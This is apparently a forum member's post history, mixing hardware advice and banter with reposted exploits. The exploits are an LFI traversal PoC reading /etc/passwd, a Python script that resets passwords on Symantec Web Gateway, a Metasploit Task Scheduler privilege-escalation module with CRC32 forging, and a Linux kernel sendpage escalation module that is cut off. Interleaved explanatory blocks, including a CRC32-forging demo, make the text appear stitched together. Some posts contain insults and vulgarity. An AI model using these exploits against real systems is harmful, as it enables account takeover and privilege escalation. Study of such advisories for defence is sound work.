LLegoLLaS
Everything posted by LLegoLLaS

  1. For serious OC you need a K-series processor (I recommend the 2500K or Ivy Bridge) and a cooler at least as good as mine. Still, avoid using that Zerotherm on that board; in a push-pull configuration you won't be able to use RAM slots 1 and 2. "Friend" Sithalkes, the video card's RAM isn't everything; remember the bandwidth through which that memory is used. Not everyone swaps parts twice a year like you do. I'd ask that we keep the discussion civil. I recommended Nvidia because they are clearly superior in drivers (as you rightly say yourself) and have better compatibility with Intel than AMD Radeon. Until now I've only had AMD, so I know what I'm talking about. On top of that, AMD on Linux is pretty much useless. @vctor: you can do the cable management yourself with a bit of patience and two hours to spare. Just follow an order: MB > CPU > PSU etc.
  2. I recommend my configuration: "Sistem echilibrat" - wishlist by Cipry N. (take out what you don't need from it: monitor, keyboards etc.). I can offer support; that PC was bought at the start of the year, you can replace it with an Ivy Bridge. Don't go with AMD Radeon since you're putting in an Intel processor (from experience). @Sithalkes stop recommending random things you know nothing about ("1-2 gigs", honestly. You don't build a PC every year and you don't throw parts into it like on a Dacia, especially considering the budget is decent for a good base for a mid-to-high gaming PC)
  3. Is this monitoring business even legal? ps: screw the guy with the virus. ProTV got a cartload of money for this report meant to scare Ionut, the Counter-Strike player and TS-movie maniac
  4. I for one agree with what gecko did
  5. You are / you pass yourself off as a designer. I won't argue with you. Mosad back? +1
  6. +1 for the one with "we don't care" but with a different slogan. Preferably "the essence of the future..."
  7. Correct. I wasn't expecting it, but it inspires a surprising amount of confidence. I'll put it on a virtual machine first and will probably migrate when the final version comes out.
  8. -=[--------------------ADVISORY-------------------]=-
     Ad Manager Pro v. 4
     Author: Corrado Liotta Aka CorryL [corryl80[a]gmail.com]
     -=[-----------------------------------------------]=-

     -=[+] Application: Ad Manager Pro
     -=[+] Version: 4
     -=[+] Vendor's URL: http://www.phpwebscripts.com/ad-manager-pro/
     -=[+] Platform: Windows\Linux\Unix
     -=[+] Bug type: LFI
     -=[-]
     -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
     -=[+] Facebook: https://www.facebook.com/CorryL
     -=[+] Twitter: https://twitter.com/#!/CorradoLiotta
     -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
     -=[+] WebSite: http://corryl80.blogspot.com/

     ...::[ Description ]::..

     Ad Manager Pro is the most complete ad management solution available. You can use it to manage ads on your site(s); you can also sell clicks, impressions and/or day ranges to advertisers and purchase clicks and/or impressions from publishers. Features of this quality system may bring you an interesting income. You and your users have real-time statistics for each ad (hourly, daily, monthly), and a graphical statistic is also available. Advertisers and publishers can order daily email reports. Each ad may be used in multiple campaigns; each campaign has its own statistics and configuration. Support for classic banners (gif, jpg, png, swf), plain text/html ads, ads from templates (Google AdWords style). You can display ads on pages or in popup consoles. There are many ways to show ads on pages: javascript, iframe, php include command. It lets you place the ads on any webpage. Option to load a new ad after a given number of seconds. Ads can be targeted by countries, days, hours.

     ...::[ Bug ]::..

     Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized and allows directory traversal characters to be injected.

     ...::[ Proof Of Concept ]::..

     http://remote-server/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

     ...::[ Disclosure Timeline ]::..

     [23/08/2012] - Public Disclosure

     --
     Corrado Liotta A.k.a (CorryL)
     Admin x0n3-h4ck Italian Security Team
     Email: corryl80@gmail.com
     Skype: corrado_liotta
     Facebook: http://www.facebook.com/home.php/CorryL
     Twitter: https://twitter.com/#!/CorradoLiotta
     Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
     WebSite: http://corryl80.blogspot.com/

     source: bugsearch.net
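The bug in the advisory above is a single `page` parameter handed to an include without a check. As an added example (my code, not code from Ad Manager Pro or from the advisory), the Python below shows the two checks a maintainer would put in front of such an include, plus a small detector that flags the advisory's PoC pattern in raw query strings, including the double-encoded variant. The include directory `/var/www/app/pages` and the page names are assumptions; the sample query strings are constructed, the second one being the advisory's own PoC.

```python
"""Added example: hardening a `page=` include and spotting the advisory's PoC.

This is not code from Ad Manager Pro or from the advisory. The include
directory and the page names below are assumptions for illustration.
"""
import posixpath
import urllib.parse

PAGES_DIR = "/var/www/app/pages"                 # assumed include directory
ALLOWED_PAGES = {"home", "stats", "campaigns"}   # assumed page names


def decode_fully(value, max_rounds=3):
    """URL-decode until the value stops changing, so a double-encoded
    '..%252F' is seen as '../' just like the single-encoded PoC."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_page(page_param):
    """Return the file to include for a `page` value, or None to refuse.

    Two independent checks: the name must be on the allow-list, and the
    normalised path must still sit under PAGES_DIR. Either one alone stops
    the traversal from the advisory; keeping both means a later change to
    the allow-list cannot silently reopen the hole.
    """
    name = decode_fully(page_param)
    if "\x00" in name:                        # null-byte truncation trick
        return None
    if name not in ALLOWED_PAGES:
        return None
    full = posixpath.normpath(posixpath.join(PAGES_DIR, name + ".php"))
    if not full.startswith(PAGES_DIR + "/"):
        return None
    return full


TRAVERSAL_MARKERS = ("../", "..\\", "/etc/", "\\windows\\")


def looks_like_traversal(query_string):
    """Detection side: does any parameter of a raw query string carry a
    traversal sequence once fully decoded?"""
    for _key, value in urllib.parse.parse_qsl(query_string, keep_blank_values=True):
        value = decode_fully(value).lower()   # parse_qsl decoded once already
        if any(marker in value for marker in TRAVERSAL_MARKERS):
            return True
    return False


# Constructed query strings (not real traffic); the second is the advisory's PoC.
SAMPLE_QUERIES = [
    "page=home",
    "page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "page=..%252F..%252Fetc%252Fpasswd",
    "page=stats&period=daily",
]


def flag_suspicious(queries):
    """Return the query strings that a log review should raise."""
    return [q for q in queries if looks_like_traversal(q)]


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        page = dict(urllib.parse.parse_qsl(q)).get("page", "")
        print(f"{q[:50]:<52} traversal={looks_like_traversal(q)!s:<5} include={resolve_page(page)}")
```

The allow-list is the real fix; the `normpath` containment check is there so that a future "let admins pick any page" change cannot quietly bring the traversal back. On the detection side, decoding until the value stops changing is what catches the `%252F` variant that a single decode would miss.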
  9. Code: Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (PoC by @_Kc57)

```python
#!/usr/bin/python
import urllib
import urllib2
import re
import sys

print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"

if (len(sys.argv) != 4):
    print "Usage: poc.py <RHOST> <username> <newpassword>"
    exit(0)

ip       = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

# The PoC posts the password-change form directly, with no session or
# credentials of its own, for the user named on the command line.
url = "https://%s/spywall/temppassword.php" % (ip)
opts = {
    'target'    : 'executive_summary.php',
    'USERNAME'  : username,
    'password'  : password,
    'password2' : password,
    'Save'      : 'Save'
}

print "[*] Sending request to server..."
data = urllib.urlencode(opts)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)

# The application confirms a successful change with this string
match = re.search('Your new password has been saved', response.read())
if(match):
    print "[*] Password for %s changed to %s" %(username,password)
else:
    print "[*] Password change failed!"
```

     source: bugsearch.net
  10. |May you live long and well and drink like you've never drunk before|
  11. If you had genuinely needed the program you would have searched by md5 or filename: Youtube Viewer V3!.exe download - 2shared https://www.virustotal.com/file/483fa11c3ef5ef8ffe181827c9b8b1d99e45d3563920363b4e2c773adecb743f/analysis/
  12. Apple iPhone 4 vs. HTC One S - GSMArena.com I'd choose the HTC
  13. I have to disagree with you here: I bet that in the countries you consider normal there are discussions like this. Or worse. See ".onion". We are far from being the smartest/most honest/most upright/richest, but just as far from being the dumbest/worst/poorest/most criminal! (as a nation)
  14. The front looks more like an E52/E55, the back like an E71. Fake and GAY!
  15. Confirmed, close the topic
  16. Selling/trading for anything I find interesting (tracker invites excluded)
  17. ps: stop philosophising about this subject (stop, so that maybe "she" and the other nonsense stop too). It has already gone too far and this thing can't be stopped any more. The purpose is as serious as it gets. You're getting thrown out of the education system, you unfucked wretch
  18. Not sure whether this has been posted before: zJAzzNzOBMZyyAAB0zhZcg=5cgcTcg=5yOADyAzOBNBOBMZU38ymcg=5yOADyAzOBM7OBNCSfS2OBMZgAJKJ0znaAzYA00zbybzbBJY6vb2OBMZSAAQZA0zbybzbBJQFwS2OBMZSAAQZA0zbybzbBJC6wSzbBWZ6cuz5BgA+3+KkcgCZcg=5Bg=5Bgq2cgZZA+Akw8w6ERzdyg7bBd/xBMqbBTNG GILA "Rather than stroke that messy mug of yours... I'd rather fuck a rotten cow carcass underwater"
  19. Thermalright GTX 285/260 VRM heatsinks Cooler VGA - PC Garage self-adhesive
  20. Crashoverride, you must be really thick, boy, and you think you're too clever. You've got a report from me because: 1. sales are closed on rst 2. attempt to rip people off / misinform
  21. Code: Windows Escalate Task Scheduler XML Privilege Escalation (Metasploit module)

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/common'
require 'rex'
require 'zlib'

class Metasploit3 < Msf::Exploit::Local

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows Escalate Task Scheduler XML Privilege Escalation',
      'Description'    => %q{
        This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
        When processing task files, the Windows Task Scheduler only uses a CRC32
        checksum to validate that the file has not been tampered with. Also, in a
        default configuration, normal users can read and write the task files that
        they have created. By modifying the task file and creating a CRC32 collision,
        an attacker can execute arbitrary commands with SYSTEM privileges.

        NOTE: Thanks to webDEViL for the information about disable/enable.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'Version'        => '$Revision$',
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'Platform'       => [ 'windows' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [
        [ 'Windows Vista, 7, and 2008', {} ],
      ],
      'References'     => [
        [ 'OSVDB', '68518' ],
        [ 'CVE', '2010-3338' ],
        [ 'BID', '44357' ],
        [ 'MSB', 'MS10-092' ],
        [ 'EDB', 15589 ]
      ],
      'DisclosureDate' => 'Sep 13 2010',
      'DefaultTarget'  => 0
    }))

    register_options([
      OptString.new("CMD",      [ false, "Command to execute instead of a payload" ]),
      OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]),
    ])
  end

  def check
    vuln = false
    winver = sysinfo["OS"]
    affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
    affected.each { |v|
      if winver.include? v
        vuln = true
        break
      end
    }
    if not vuln
      return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Appears
  end

  def exploit
    if sysinfo["Architecture"] =~ /wow64/i
      #
      # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
      # worse, meterpreter/railgun creates things in a new thread, making it much more
      # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
      # offer a workaround and error out.
      #
      print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
      return
    end

    winver = sysinfo["OS"]
    if check == Exploit::CheckCode::Safe
      print_error("#{winver} is not vulnerable.")
      return
    end

    taskname  = datastore["TASKNAME"] || nil
    cmd       = datastore["CMD"] || nil
    upload_fn = nil
    tempdir   = session.fs.file.expand_path("%TEMP%")

    if not cmd
      # Get the exe payload.
      exe = generate_payload_exe
      # and place it on the target in %TEMP%
      tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
      cmd = tempdir + "\\" + tempexename + ".exe"
      print_status("Preparing payload at #{cmd}")
      write_file(cmd, exe)
    else
      print_status("Using command: #{cmd}")
    end

    #
    # Create a new task to do our bidding, but make sure it doesn't run.
    #
    taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
    sysdir = session.fs.file.expand_path("%SystemRoot%")
    taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"

    print_status("Creating task: #{taskname}")
    cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
    #print_debug("Will Execute:\n\t#{cmdline}")
    exec_schtasks(cmdline, "create the task")

    #
    # Read the contents of the newly created task file
    #
    content = read_task_file(taskname, taskfile)

    #
    # Double-check that we got what we expect.
    #
    if content[0,2] != "\xff\xfe"
      #
      # Convert to unicode, since it isn't already
      #
      content = content.unpack('C*').pack('v*')
    else
      #
      # NOTE: we strip the BOM here to exclude it from the crc32 calculation
      #
      content = content[2,content.length]
    end

    #
    # Record the crc32 for later calculations
    #
    old_crc32 = crc32(content)
    print_status("Original CRC32: 0x%x" % old_crc32)

    #
    # Convert the file contents from unicode
    #
    content = content.unpack('v*').pack('C*')

    #
    # Mangle the contents to now run with SYSTEM privileges
    #
    content.gsub!('LeastPrivilege', 'HighestAvailable')
    content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>')
    content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>')
    #content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
    content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
    content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
    # Trailing comment whose bytes are overwritten by fix_crc32 below
    content << "<!-- ZZ -->"

    #
    # Convert it back to unicode
    #
    content = Rex::Text.to_unicode(content)

    #
    # Fix it so the CRC matches again
    #
    fix_crc32(content, old_crc32)
    new_crc32 = crc32(content)
    print_status("Final CRC32: 0x%x" % new_crc32)

    #
    # Write the new content back
    #
    print_status("Writing our modified content back...")
    fd = session.fs.file.new(taskfile, "wb")
    fd.write "\xff\xfe" + content
    fd.close

    #
    # Validate our results
    #
    print_status("Validating task: #{taskname}")
    exec_schtasks("schtasks.exe /query /tn #{taskname}", "validate the task")

    #
    # Run the task
    #
    print_status("Disabling the task...")
    exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")
    print_status("Enabling the task...")
    exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")
    print_status("Executing the task...")
    exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")

    #
    # And delete it.
    #
    print_status("Deleting the task...")
    exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
  end

  # CRC32 as the Task Scheduler computes it: init 0xffffffff, no final XOR
  def crc32(data)
    table = Zlib.crc_table
    crc = 0xffffffff
    data.unpack('C*').each { |b|
      crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
    }
    crc
  end

  def fix_crc32(data, old_crc)
    #
    # CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
    # reversed from Microsoft's code)
    #
    bwd_table = [
      0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82, 0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
      0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF, 0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
      0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618, 0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
      0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55, 0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
      0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7, 0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
      0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA, 0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
      0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D, 0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
      0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820, 0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
      0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68, 0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
      0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725, 0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
      0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2, 0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
      0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF, 0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
      0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D, 0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
      0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450, 0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
      0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387, 0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
      0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA, 0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
      0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717, 0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
      0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A, 0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
      0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D, 0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
      0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0, 0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
      0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462, 0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
      0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F, 0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
      0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8, 0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
      0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5, 0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
      0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD, 0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
      0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0, 0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
      0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67, 0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
      0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A, 0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
      0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288, 0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
      0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5, 0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
      0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812, 0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
      0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F, 0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
    ]

    # Put the running CRC into the first 4 of the last 12 bytes, walk the
    # old CRC backwards over those 12 bytes, then overwrite the same 4 bytes
    # with the result: the register after them now matches the original file.
    crc = crc32(data[0, data.length - 12])
    data[-12, 4] = [crc].pack('V')
    data[-12, 12].unpack('C*').reverse.each { |b|
      old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
    }
    data[-12, 4] = [old_crc].pack('V')
  end

  def exec_schtasks(cmdline, purpose)
    cmdline = "/c #{cmdline.strip} && echo SCHELEVATOR"
    lns = cmd_exec('cmd.exe', cmdline)
    success = false
    lns.each_line { |ln|
      ln.chomp!
      if ln =~ /^SUCCESS\:\s/
        success = true
        print_status(ln)
      else
        print_status(ln)
      end
    }
    success
  end

  def read_task_file(taskname, taskfile)
    print_status("Reading the task file contents from #{taskfile}...")
    # Can't read the file directly on 2008?
    content = ''
    fd = session.fs.file.new(taskfile, "rb")
    until fd.eof?
      content << fd.read
    end
    fd.close
    content
  end

end
```

     source: bugsearch.net
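The module's description is the whole lesson: a CRC32 is a checksum, not an authenticator, so anyone who can write the file can make any edit and then put the checksum back. Below is an added example of mine in Python (not the module's Ruby `fix_crc32`, which uses a precomputed backward table; this one derives the reverse step from the forward table) that applies the module's edits to a constructed stand-in for a task XML, then hides four fix-up bytes in a trailing comment so that `zlib.crc32()` of the tampered file equals the original. The XML is made up and is not a real Task Scheduler file; the comment filler loop is my own way of keeping the forced bytes printable.

```python
"""Added example: restore a CRC32 after tampering, the way the module does.

Not code from the Metasploit module above. The XML below is a constructed
stand-in, not a real Task Scheduler task file.
"""
import zlib
import xml.etree.ElementTree as ET

MASK = 0xFFFFFFFF
POLY = 0xEDB88320                       # reflected CRC-32 polynomial (zlib)

# Forward table: register after feeding byte i into register 0.
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)

# The top byte of TABLE[i] is distinct for every i, which is what lets a
# byte step be undone from the register alone.
REV_TOP = {TABLE[i] >> 24: i for i in range(256)}
assert len(REV_TOP) == 256


def crc32(data):
    return zlib.crc32(data) & MASK


def step(reg, b):
    """One forward byte step on the internal register."""
    return TABLE[(reg ^ b) & 0xFF] ^ (reg >> 8)


def unstep(reg, b):
    """Exact inverse of step(): the register that step(..., b) produced reg from."""
    i = REV_TOP[reg >> 24]
    return (((reg ^ TABLE[i]) << 8) | (i ^ b)) & MASK


def crc32_patch(prefix, suffix, target):
    """Return 4 bytes p with crc32(prefix + p + suffix) == target."""
    reg = crc32(prefix) ^ MASK              # internal register after prefix
    want = target ^ MASK                    # internal register wanted at the end
    for b in reversed(suffix):              # undo the known suffix ...
        want = unstep(want, b)
    indices = []                            # ... then walk back over the 4 free bytes,
    for _ in range(4):                      # recovering only the table index used
        i = REV_TOP[want >> 24]
        indices.append(i)
        want = ((want ^ TABLE[i]) << 8) & MASK
    indices.reverse()
    patch = bytearray()
    for i in indices:                       # forward again, choosing each byte so
        patch.append((reg ^ i) & 0xFF)      # that it selects the index we need
        reg = step(reg, patch[-1])
    return bytes(patch)


SAFE = set(range(0x20, 0x7F)) - set(b"-<>&")


def forge_xml(original, modified, max_tries=20000):
    """Append an XML comment to `modified` so its CRC32 equals that of
    `original`, retrying the comment filler until the fix-up bytes are
    printable and legal inside a comment (no '-', so never '--')."""
    target = crc32(original)
    suffix = b" -->"
    for n in range(max_tries):
        prefix = modified + b"<!-- %d " % n
        patch = crc32_patch(prefix, suffix, target)
        if all(b in SAFE for b in patch):
            return prefix + patch + suffix
    raise RuntimeError("no printable fix-up found")


def same_crc32(a, b):
    return crc32(a) == crc32(b)


def well_formed(data):
    try:
        ET.fromstring(data)
        return True
    except ET.ParseError:
        return False


# Constructed task stand-in, and the edits the module makes to it.
ORIGINAL_XML = (
    b'<Task><Principals><Principal id="Author">'
    b'<UserId>S-1-5-21-1-2-3-1001</UserId><RunLevel>LeastPrivilege</RunLevel>'
    b'</Principal></Principals></Task>'
)
MODIFIED_XML = (ORIGINAL_XML
                .replace(b"LeastPrivilege", b"HighestAvailable")
                .replace(b"S-1-5-21-1-2-3-1001", b"S-1-5-18")
                .replace(b'Principal id="Author"', b'Principal id="LocalSystem"'))


def demo():
    forged = forge_xml(ORIGINAL_XML, MODIFIED_XML)
    return forged, crc32(ORIGINAL_XML), crc32(forged)


if __name__ == "__main__":
    forged, crc_before, crc_after = demo()
    print(forged.decode())
    print("original 0x%08x  forged 0x%08x" % (crc_before, crc_after))
```

The register after four free bytes depends only on which table indices those bytes select, not on the register before them; that is why the backward walk needs only the top byte at each step and why any target value can be reached with exactly four bytes. The practical consequence for the defender is that no tweak to the CRC (different polynomial, different initial value) helps: only a keyed MAC or a signature over the file, checked by a process the user cannot write to, ties the checksum to the content.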
  22. Code: Linux Kernel Sendpage Local Privilege Escalation (Metasploit module)

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'

#load 'lib/msf/core/post/file.rb'
#load 'lib/msf/core/exploit/local/unix.rb'
#load 'lib/msf/core/exploit/local/linux.rb'
#load 'lib/msf/core/exploit/local/linux_kernel.rb'

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::Local::LinuxKernel
  include Msf::Exploit::Local::Linux
  include Msf::Exploit::Local::Unix

  def initialize(info={})
    super( update_info( info, {
      'Name'          => 'Linux Kernel Sendpage Local Privilege Escalation',
      'Description'   => %q{
        AKA Wunderbar Emporium
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'spender', # wunderbar_emporium.tgz
        'rcvalle', # sock_sendpage.c
        'egypt'    # metasploit module
      ],
      'Platform'      => [ 'linux' ],
      'Arch'          => [ ARCH_X86 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'References'    => [
        [ 'CVE', '2009-2692' ],
        [ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
        [ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
      ],
      'Targets'       => [
        [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
        #[ 'Linux x64', { 'Arch' => ARCH_X86_64 } ],
      ],
      'DefaultTarget' => 0,
    } ))
  end

  def exploit
    # The exploit binary is built on the fly with Metasm: a tiny asm entry
    # stub, bionic's libc pieces, then the C below compiled into it.
    sc = Metasm::ELF.new(@cpu)
    sc.parse %Q|
      #define DEBUGGING
      #define NULL ((void*)0)
      #ifdef __ELF__
      .section ".bss" rwx
      .section ".text" rwx
      .entrypoint
      #endif
      call main
      ;push eax
      call exit
    |

    # Set up the same include order as the bionic build system.
    # See external/source/meterpreter/source/bionic/libc/Jamfile
    cparser.lexer.include_search_path = [
      "external/source/meterpreter/source/bionic/libc/include/",
      "external/source/meterpreter/source/bionic/libc/private/",
      "external/source/meterpreter/source/bionic/libc/bionic/",
      "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/",
      "external/source/meterpreter/source/bionic/libc/kernel/common/",
      "external/source/meterpreter/source/bionic/libc/arch-x86/include/",
    ]

    cparser.parse(%Q|
      #define DEBUGGING
      // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h
      #ifndef __extension__
      #define __extension__
      #endif
      // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h
      // Doing #if on an undefined macro is fine in GCC, but a parse error in
      // metasm.
      #ifndef __STDC__
      #define __STDC__ 0
      #endif
      #include <sys/types.h>
      #include <sys/mman.h>
      #include <stdarg.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <errno.h>

      /* OpenBSD's strcmp from string/strcmp.c in bionic */
      int strcmp(const char *s1, const char *s2)
      {
        while (*s1 == *s2++)
          if (*s1++ == 0)
            return (0);
        return (*(unsigned char *)s1 - *(unsigned char *)--s2);
      }
    |)

    [
      "external/source/meterpreter/source/bionic/libc/bionic/__errno.c",
      "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c",
      "external/source/meterpreter/source/bionic/libc/stdio/stdio.c",
      "external/source/meterpreter/source/bionic/libc/unistd/mmap.c",
      # This parses without any trouble, but actually calling perror() causes
      # immediate segfaults.
      #"external/source/meterpreter/source/bionic/libc/unistd/perror.c",
      # For some ungodly reason, NULL ends up being undefined when parsing this
      # guy, which of course causes parse errors.
      #"external/source/meterpreter/source/bionic/libc/stdio/mktemp.c",
    ].each do |fname|
      print_status("Parsing c file #{fname}")
      cparser.parse(File.read(fname), fname)
    end

    print_status("Unix socket.h")
    unix_socket_h(sc)
    current_task_struct_h(sc)

    case target.arch.first
    when ARCH_X86
      print_status("syscall wrappers")
      linux_x86_syscall_wrappers(sc)

      main = %q^
        #ifdef __x86_64__
        #define PTR_FMT "0x%016x"
        #else
        #define PTR_FMT "0x%08x"
        #endif
        #define NULL ((void*)0)
        #define DOMAINS_STOP -1

        /* Protocol families whose proto_ops leave sendpage NULL */
        const int domains[] = {
          PF_BLUETOOTH, PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25, PF_AX25,
          PF_BLUETOOTH, PF_PPPOX, DOMAINS_STOP
        };

        int *apparmor_enabled;
        int got_ring0 = 0;
        unsigned long uid, gid;

        static unsigned long get_kernel_sym(char *name)
        {
          FILE *f;
          unsigned long addr;
          char dummy;
          char sname[256];
          int ret;

          f = fopen("/proc/kallsyms", "r");
          if (f == NULL) {
            f = fopen("/proc/ksyms", "r");
            if (f == NULL) {
